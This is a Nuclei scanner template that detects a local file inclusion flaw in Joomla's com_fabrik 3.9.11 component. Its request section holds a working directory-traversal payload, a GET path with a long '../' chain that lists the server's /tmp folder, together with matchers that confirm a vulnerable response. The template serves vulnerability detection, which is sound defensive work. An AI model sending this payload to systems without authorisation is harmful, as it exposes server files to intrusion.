id: joomla-com-fabrik-lfi

info:
  name: Joomla! com_fabrik 3.9.11 - Local File Inclusion
  author: dhiyaneshDk
  severity: high
  description: Joomla! com_fabrik 3.9.11 is vulnerable to local file inclusion.
  reference:
    - https://www.exploit-db.com/exploits/48263
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  tags: joomla,lfi

requests:
  - method: GET
    path:
      - '{{BaseURL}}/index.php?option=com_fabrik&task=plugin.pluginAjax&plugin=image&g=element&method=onAjax_files&folder=../../../../../../../../../../../../../../../tmp/'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"value":'
          - '"disable":false'
          - 'text'
        part: body
        condition: and

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/08/03
